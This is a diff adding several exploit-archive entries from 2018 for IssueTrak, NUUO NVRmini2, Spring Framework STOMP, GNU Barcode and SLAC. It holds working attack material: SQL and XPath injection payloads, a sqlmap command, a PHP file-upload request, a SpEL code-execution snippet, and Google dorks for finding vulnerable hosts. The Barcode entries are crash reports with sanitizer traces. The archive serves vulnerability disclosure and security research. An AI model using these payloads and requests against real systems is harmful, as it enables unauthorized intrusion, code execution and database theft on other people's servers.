diff --git a/exploits/asp/webapps/44792.txt b/exploits/asp/webapps/44792.txt new file mode 100644 index 000000000..7a775937c --- /dev/null +++ b/exploits/asp/webapps/44792.txt 
@@ -0,0 +1,71 @@ +================ +Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7) +Date: 05-28-2018 +Vendor Homepage: http://issuetrak.com +Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely +Google Dork: inurl:"IssueTrak" inurl:"asp" +Discovered By: Chris Anastasio +================ + + +Vulnerable Endpoint +=================== +www.example.com/IssueTrak/IssueSearch_Process.asp + + + +Vulnerable Parameters +===================== +Status +Priority +inp_IssueType +SubmittedBy +EnteredBy +AssignedTo +AssignedBy +NextActionBy +ClosedBy +ProjectManager +inp_OrgID + + + +Raw HTTP Request +=========================== +POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1 +Host: example.com +Content-Type: application/x-www-form-urlencoded +Content-Length: 905 + +TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc + + + +SQLMap command +============== +sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch +Notes: + - "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above. 
+ - The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation. + + + +Notes +===== +- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database. +- Authentication is generally required in order to hit this endpoint. If a non SQL injection request is made the reuslt is a redirect to the login page. However, it seems that on the back end, this request touches the database even without authentication, making it exploitable from a pre-authentication vantage point. +- IssueTrak 7.0 was released in 2006 + + + +Timeline +======== +2018-05-18: Initial vendor contact +2018-05-21: Vendor implies that this version of IssueTrak is no longer supported. Also states that releases starting with 9.7 the application does not suffer from thsi vulnerability +2016-05-28: PoC details published + + + +About Illumant +============== +Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/ \ No newline at end of file diff --git a/exploits/hardware/webapps/44794.txt b/exploits/hardware/webapps/44794.txt new file mode 100644 index 000000000..e64136357 --- /dev/null +++ b/exploits/hardware/webapps/44794.txt 
@@ -0,0 +1,75 @@ +# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability +# Google Dork: intitle:NUUO Network Video Recorder Login +# Date: 2018-05-20 +# Exploit Author: M3@Pandas +# Vendor Homepage: http://www.nuuo.com +# Software Link: N/A +# Version: all +# Tested on: PHP Linux +# CVE : CVE-2018-11523 + +========================== +Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability +Author: M3@pandas From DBAppSecurity +Affected Version: All +========================== +Vulnerability Description +========================== + + +Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over +the world. + + +Vulnerable cgi: /upload.php + + + + + + + +As the code above, no any filter, so we can upload a php shell directly to the web server. + + +========================== +POC EXP +========================== + + +1. Upload 'nuuonvr.php' to web root path: + +POST /upload.php HTTP/1.1 +Host: 192.168.10.1 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Content-Type: multipart/form-data; boundary=--------969849961 +Content-Length: 162 + +----------969849961 +Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php" + +?php phpinfo();@unlink(__FILE__);? +----------969849961-- + + +2. Check if the php file is uploaded successfully: + GET http://192.168.10.1/nuuonvr.php + + If the page returns phpinfo info, target is vulnerable! \ No newline at end of file diff --git a/exploits/java/webapps/44796.txt b/exploits/java/webapps/44796.txt new file mode 100644 index 000000000..430f83ade --- /dev/null +++ b/exploits/java/webapps/44796.txt 
@@ -0,0 +1,28 @@ +# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution +# Date: 2018-05-28 +# Exploit Author: JameelNabbo +# Website: jameelnabbo.com +# Vendor Homepage: +# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development +# CVE: CVE: CVE-2018-1270 +# Version: <= 5.0.x + +# Description: By connecting to spring STOMP, and putting the key for "selector" +# header, we can execute code on Spring. + +# POC: +# Here' we are writting java commands to be executed within the selector header +# Connecting to a web socket using SockJS +# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable + +var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"}; + +var socket = new SockJS('/gs-guide-websocket'); +var stompClient = webstomp.over(socket); +stompClient.connect({}, function (frame){ + setConnected(true); + console.log('Connected: ' + frame); + stompClient.subscribe('/topic/greetings', function(greeting){ + showGreeting(JSON.parse(greeting.body).content); + },header); +}); \ No newline at end of file diff --git a/exploits/linux/local/44797.txt b/exploits/linux/local/44797.txt new file mode 100644 index 000000000..d40feae89 --- /dev/null +++ b/exploits/linux/local/44797.txt 
@@ -0,0 +1,188 @@ +# GNU Barcode 0.99 - Buffer Overflow +# Vendor: The GNU Project | Free Software Foundation, Inc. +# Product web page: https://www.gnu.org/software/barcode/ +# https://directory.fsf.org/wiki/Barcode +# Author: Gjoko 'LiquidWorm' Krstic +# Tested on: Ubuntu 16.04.4 +# Affected version: 0.99 + +# Summary: GNU Barcode is a tool to convert text strings to printed bars. +# It supports a variety of standard codes to represent the textual strings +# and creates postscript output. + +# Desc: The vulnerability is caused due to a boundary error in the processing +# of an input file, which can be exploited to cause a buffer overflow when a +# user processes e.g. a specially crafted file. Successful exploitation could +# allow execution of arbitrary code on the affected machine. + + +code93.c: + +165: strcat(partial, codeset[code]); +166: checksum_str[checksum_len++] = code; +167: +168: /* Encode the second character */ +169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet; +170: strcat(partial, codeset[code]); +171: checksum_str[checksum_len++] = code; + +lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128 +%!PS-Adobe-2.0 +%%Creator: "barcode", libbarcode sample frontend +%%DocumentPaperSizes: A4 +%%EndComments +%%EndProlog + +%%Page: 1 1 + +% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled 1.00, encoded using "code 39" +% The space/bar succession is represented by the following widths (space first): +% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311 +[ +% height xpos ypos width height xpos ypos width + [75.00 10.50 15.00 0.85] [75.00 14.50 15.00 0.85] + [75.00 17.50 15.00 2.85] [75.00 21.50 15.00 2.85] + [75.00 24.50 15.00 0.85] [70.00 27.50 20.00 2.85] + [70.00 33.50 20.00 2.85] 
[70.00 36.50 20.00 0.85] + [70.00 38.50 20.00 0.85] [70.00 40.50 20.00 0.85] + [70.00 42.50 20.00 0.85] [70.00 46.50 20.00 0.85] + [70.00 48.50 20.00 0.85] [70.00 52.50 20.00 0.85] + [70.00 56.50 20.00 0.85] [70.00 58.50 20.00 0.85] + [70.00 60.50 20.00 0.85] [70.00 62.50 20.00 0.85] + [70.00 67.50 20.00 2.85] [70.00 71.50 20.00 2.85] + [70.00 74.50 20.00 0.85] [70.00 78.50 20.00 0.85] + [70.00 82.50 20.00 0.85] [70.00 86.50 20.00 0.85] + [70.00 88.50 20.00 0.85] [70.00 91.50 20.00 2.85] + [70.00 94.50 20.00 0.85] [70.00 96.50 20.00 0.85] + [70.00 100.50 20.00 0.85] [70.00 103.50 20.00 2.85] + [70.00 106.50 20.00 0.85] [70.00 110.50 20.00 0.85] + [70.00 112.50 20.00 0.85] [70.00 116.50 20.00 0.85] + [70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85] + [70.00 127.50 20.00 2.85] [70.00 130.50 20.00 0.85] + [70.00 132.50 20.00 0.85] [70.00 136.50 20.00 0.85] + [70.00 138.50 20.00 0.85] [70.00 140.50 20.00 0.85] + [70.00 144.50 20.00 0.85] [70.00 148.50 20.00 0.85] + [70.00 152.50 20.00 0.85] [70.00 155.50 20.00 2.85] + [70.00 158.50 20.00 0.85] [70.00 160.50 20.00 0.85] + [70.00 162.50 20.00 0.85] [70.00 167.50 20.00 2.85] + [70.00 171.50 20.00 2.85] [70.00 177.50 20.00 2.85] + [70.00 180.50 20.00 0.85] [70.00 182.50 20.00 0.85] + [70.00 184.50 20.00 0.85] [70.00 187.50 20.00 2.85] + [70.00 193.50 20.00 2.85] [70.00 196.50 20.00 0.85] + [70.00 198.50 20.00 0.85] [70.00 200.50 20.00 0.85] + [70.00 202.50 20.00 0.85] [70.00 204.50 20.00 0.85] + [70.00 206.50 20.00 0.85] [70.00 211.50 20.00 2.85] + [70.00 215.50 20.00 2.85] [70.00 219.50 20.00 2.85] + [70.00 225.50 20.00 2.85] [70.00 228.50 20.00 0.85] + [70.00 230.50 20.00 0.85] [70.00 232.50 20.00 0.85] + [70.00 235.50 20.00 2.85] [70.00 241.50 20.00 2.85] + [70.00 244.50 20.00 0.85] [70.00 246.50 20.00 0.85] + [70.00 248.50 20.00 0.85] [70.00 251.50 20.00 2.85] + [70.00 257.50 20.00 2.85] [70.00 260.50 20.00 0.85] + [70.00 262.50 20.00 0.85] [70.00 264.50 20.00 0.85] + [70.00 267.50 20.00 2.85] [70.00 273.50 20.00 
2.85] + [70.00 276.50 20.00 0.85] [70.00 278.50 20.00 0.85] + [70.00 280.50 20.00 0.85] [70.00 283.50 20.00 2.85] + [70.00 289.50 20.00 2.85] [70.00 292.50 20.00 0.85] + [70.00 294.50 20.00 0.85] [70.00 296.50 20.00 0.85] + [70.00 299.50 20.00 2.85] [70.00 305.50 20.00 2.85] + [70.00 308.50 20.00 0.85] [70.00 310.50 20.00 0.85] + [70.00 312.50 20.00 0.85] [70.00 315.50 20.00 2.85] + [70.00 321.50 20.00 2.85] [70.00 324.50 20.00 0.85] + [70.00 326.50 20.00 0.85] [70.00 328.50 20.00 0.85] + [70.00 331.50 20.00 2.85] [70.00 337.50 20.00 2.85] + [70.00 340.50 20.00 0.85] [70.00 342.50 20.00 0.85] + [70.00 344.50 20.00 0.85] [70.00 346.50 20.00 0.85] + [70.00 349.50 20.00 2.85] [70.00 354.50 20.00 0.85] + [70.00 357.50 20.00 2.85] [70.00 360.50 20.00 0.85] + [70.00 363.50 20.00 2.85] [70.00 369.50 20.00 2.85] + [70.00 372.50 20.00 0.85] [70.00 374.50 20.00 0.85] + [70.00 376.50 20.00 0.85] [70.00 379.50 20.00 2.85] + [70.00 385.50 20.00 2.85] [70.00 388.50 20.00 0.85] + [70.00 390.50 20.00 0.85] [70.00 392.50 20.00 0.85] + [70.00 395.50 20.00 2.85] [70.00 398.50 20.00 0.85] + [70.00 400.50 20.00 0.85] [70.00 403.50 20.00 2.85] + [70.00 408.50 20.00 0.85] [75.00 410.50 15.00 0.85] + [75.00 414.50 15.00 0.85] [75.00 417.50 15.00 2.85] + [75.00 421.50 15.00 2.85] [75.00 424.50 15.00 0.85] + +] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall +[ +% char xpos ypos fontsize + [(W) 32.00 10.00 12.00] + [(+) 48.00 10.00 0.00] + [(G) 64.00 10.00 0.00] + [($) 80.00 10.00 0.00] + [(A) 96.00 10.00 0.00] + [(+) 112.00 10.00 0.00] + [(M) 128.00 10.00 0.00] + [(%) 144.00 10.00 0.00] + [(K) 160.00 10.00 0.00] + [(W) 176.00 10.00 0.00] + [(W) 192.00 10.00 0.00] + [(G) 208.00 10.00 0.00] + [(W) 224.00 10.00 0.00] + [(W) 240.00 10.00 0.00] + [(W) 256.00 10.00 0.00] + [(W) 272.00 10.00 0.00] + [(W) 288.00 10.00 0.00] + [(W) 304.00 10.00 0.00] + [(W) 320.00 10.00 0.00] + [(W) 336.00 10.00 0.00] + [(9) 352.00 10.00 0.00] + [(W) 368.00 10.00 0.00] + [(W) 384.00 10.00 0.00] 
+] { {} forall dup 0.00 ne { + /Helvetica findfont exch scalefont setfont + } {pop} ifelse + moveto show} bind forall +% End barcode for "W+G$A+M%KWWGWWWWWWWW9WW" + +showpage +%%Page: 2 2 + +================================================================= +==11076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000043bc02 at pc 0x00000042189a bp 0x7fff2f160c00 sp 0x7fff2f160bf0 +READ of size 1 at 0x00000043bc02 thread T0 + #0 0x421899 in Barcode_93_encode /home/lqwrm/research/barcode-0.99/code93.c:169 + #1 0x409ac2 in Barcode_Encode_and_Print /home/lqwrm/research/barcode-0.99/library.c:234 + #2 0x402319 in main /home/lqwrm/research/barcode-0.99/main.c:564 + #3 0x7f9b8745282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) + #4 0x404708 in _start (/home/lqwrm/research/barcode-0.99/barcode+0x404708) + +0x00000043bc02 is located 32 bytes to the right of global variable '*.LC6' defined in 'code93.c' (0x43bbe0) of size 2 + '*.LC6' is ascii string '1' +0x00000043bc02 is located 30 bytes to the left of global variable 'CSWTCH.16' defined in 'code93.c:146:5' (0x43bc20) of size 48 +SUMMARY: AddressSanitizer: global-buffer-overflow /home/lqwrm/research/barcode-0.99/code93.c:169 Barcode_93_encode +Shadow bytes around the buggy address: + 0x00008007f730: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 + 0x00008007f740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x00008007f750: 00 00 00 00 07 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 + 0x00008007f760: f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 + 0x00008007f770: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 +=>0x00008007f780:[f9]f9 f9 f9 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 + 0x00008007f790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x00008007f7a0: 01 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x00008007f7b0: 00 00 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 f9 f9 + 0x00008007f7c0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 f9 f9 + 0x00008007f7d0: 07 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 f9 f9 
f9 f9 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe +==11076==ABORTING \ No newline at end of file diff --git a/exploits/linux/local/44798.txt b/exploits/linux/local/44798.txt new file mode 100644 index 000000000..bd7a2104b --- /dev/null +++ b/exploits/linux/local/44798.txt 
@@ -0,0 +1,207 @@ +# GNU Barcode 0.99 - Memory Leak +# Vendor: The GNU Project | Free Software Foundation, Inc. +# Product web page: https://www.gnu.org/software/barcode/ +# https://directory.fsf.org/wiki/Barcode +# Affected version: 0.99 +# Tested on: Ubuntu 16.04.4 +# Author: Gjoko 'LiquidWorm' Krstic + +# Summary: GNU Barcode is a tool to convert text strings to printed bars. +# It supports a variety of standard codes to represent the textual strings +# and creates postscript output. + +# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited +# by malicious people to cause a DoS (Denial of Service). The vulnerability is +# caused due to an error in the 'cmdline.c', which can be exploited to cause a +# memory leak via a specially crafted file. The vulnerability is confirmed in +# version 0.99. Other versions may also be affected. + +cmdline.c: + +128: int commandline(struct commandline *args, int argc, char **argv, +129: char *errorhead) +130: { +131: struct commandline *ptr; +132: char *getopt_desc = (char *)calloc(512, 1); +133: int desc_offset = 0; +134: int opt, retval; +135: char *value; + +lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128 +%!PS-Adobe-2.0 +%%Creator: "barcode", libbarcode sample frontend +%%DocumentPaperSizes: A4 +%%EndComments +%%EndProlog + +%%Page: 1 1 + +% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B" +% The space/bar succession is represented by the following widths (space first): +% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112 +[ +% height xpos ypos width height xpos ypos width + [75.00 11.00 15.00 
1.85] [75.00 13.50 15.00 0.85] + [75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85] + [70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85] + [70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85] + [70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85] + [70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85] + [70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85] + [70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85] + [70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85] + [70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85] + [70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85] + [70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85] + [70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85] + [70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85] + [70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85] + [70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85] + [70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85] + [70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85] + [70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85] + [70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85] + [70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85] + [70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85] + [70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85] + [70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85] + [70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85] + [70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85] + [70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85] + [70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85] + [70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85] + [70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85] + [70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85] + [70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85] + [70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85] + [70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85] + [70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85] + [70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85] + [70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85] + [70.00 283.00 20.00 1.85] [70.00 285.50 20.00 
0.85] + [70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85] + [70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85] + [70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85] + [70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85] + [70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85] + [70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85] + [70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85] + [70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85] + [70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85] + [70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85] + [70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85] + [70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85] + [70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85] + [70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85] + [70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85] + [70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85] + [70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85] + [70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85] + [70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85] + [70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85] + [70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85] + [70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85] + [70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85] + [70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85] + [70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85] + [70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85] + [70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85] + [70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85] + [70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85] + [70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85] + [70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85] + [70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85] + [70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85] + [70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85] + [70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85] + [70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85] + [70.00 552.00 20.00 1.85] [70.00 555.50 20.00 
0.85] + [70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85] + [70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85] + [70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85] + [70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85] + [70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85] + [70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85] + [70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85] + [70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85] + [70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85] + [75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85] + [75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85] + +] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall +[ +% char xpos ypos fontsize + [(o) 21.00 10.00 12.00] + [(/) 32.00 10.00 0.00] + [(c) 43.00 10.00 0.00] + [(r) 54.00 10.00 0.00] + [(a) 65.00 10.00 0.00] + [(s) 76.00 10.00 0.00] + [(h) 87.00 10.00 0.00] + [(e) 98.00 10.00 0.00] + [(s) 109.00 10.00 0.00] + [(/) 120.00 10.00 0.00] + [(i) 131.00 10.00 0.00] + [(d) 142.00 10.00 0.00] + [(:) 153.00 10.00 0.00] + [(0) 164.00 10.00 0.00] + [(0) 175.00 10.00 0.00] + [(0) 186.00 10.00 0.00] + [(0) 197.00 10.00 0.00] + [(3) 208.00 10.00 0.00] + [(4) 219.00 10.00 0.00] + [(,) 230.00 10.00 0.00] + [(s) 241.00 10.00 0.00] + [(i) 252.00 10.00 0.00] + [(g) 263.00 10.00 0.00] + [(:) 274.00 10.00 0.00] + [(0) 285.00 10.00 0.00] + [(6) 296.00 10.00 0.00] + [(,) 307.00 10.00 0.00] + [(s) 318.00 10.00 0.00] + [(r) 329.00 10.00 0.00] + [(c) 340.00 10.00 0.00] + [(:) 351.00 10.00 0.00] + [(0) 362.00 10.00 0.00] + [(0) 373.00 10.00 0.00] + [(0) 384.00 10.00 0.00] + [(0) 395.00 10.00 0.00] + [(0) 406.00 10.00 0.00] + [(0) 417.00 10.00 0.00] + [(,) 428.00 10.00 0.00] + [(o) 439.00 10.00 0.00] + [(p) 450.00 10.00 0.00] + [(:) 461.00 10.00 0.00] + [(h) 472.00 10.00 0.00] + [(a) 483.00 10.00 0.00] + [(v) 494.00 10.00 0.00] + [(o) 505.00 10.00 0.00] + [(c) 516.00 10.00 0.00] + [(,) 527.00 10.00 0.00] + [(r) 538.00 10.00 0.00] + [(e) 549.00 10.00 0.00] + [(p) 560.00 10.00 0.00] + 
[(:) 571.00 10.00 0.00] + [(1) 582.00 10.00 0.00] + [(2) 593.00 10.00 0.00] + [(8) 604.00 10.00 0.00] +] { {} forall dup 0.00 ne { + /Helvetica findfont exch scalefont setfont + } {pop} ifelse + moveto show} bind forall +% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128" + +showpage +%%Trailer + +==2183==ERROR: LeakSanitizer: detected memory leaks + +Direct leak of 512 byte(s) in 1 object(s) allocated from: + #0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a) + #1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132 + +Direct leak of 55 byte(s) in 1 object(s) allocated from: + #0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) + #1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489) + +SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s). \ No newline at end of file diff --git a/exploits/php/webapps/44793.txt b/exploits/php/webapps/44793.txt new file mode 100644 index 000000000..209f7bcc5 --- /dev/null +++ b/exploits/php/webapps/44793.txt 
@@ -0,0 +1,85 @@ +# # # # # +# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection +# Date: 29-05-2018 +# Vendor Homepage: https://sitemakin.com/login-script-demo +# Exploit Author: Divya Jain +# Version: v1.0 +# CVE: CVE-2018-11535 +# Category: Webapps +# Severity: High +# Tested on: KaLi LinuX_x64 +# # # # # + +# Proof of Concept: + //////////////////////////////////////////////// + SQL Injection in "my_item_search" parameter + //////////////////////////////////////////////// + + # Affected Link: demo.com/login-script-demo/users.php + + # Parameter "my_item_search" is exploitable using xpath injection + + # Payload 1: + my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - + # Payload 2: + my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- - + +# POC 1 (Result: Table_name) +/////////REQUEST////////// + + POST /login-script-demo/users.php HTTP/1.1 + Host: sitemakin.com + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Referer: https://demo.com/login-script-demo/users.php + Content-Type: application/x-www-form-urlencoded + Content-Length: 171 + Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1 + Connection: close + Upgrade-Insecure-Requests: 1 + + my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search + +/////////RESPONSE////////// + +
+ +
+ Warning: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in /home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php on line 33
+
+ Warning: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in /home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php on line 34
